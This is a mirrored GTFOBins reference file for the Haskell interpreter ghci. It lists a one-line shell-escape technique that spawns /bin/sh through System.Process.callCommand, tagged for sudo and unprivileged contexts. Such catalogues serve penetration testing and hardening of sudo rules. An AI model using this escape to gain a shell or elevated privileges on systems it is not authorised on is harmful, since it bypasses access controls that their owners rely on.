1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/ghci
2026-01-05 22:26:55 +01:00

11 lines
141 B
Plaintext

---
functions:
shell:
- code: |-
ghci
System.Process.callCommand "/bin/sh"
contexts:
sudo:
unprivileged:
...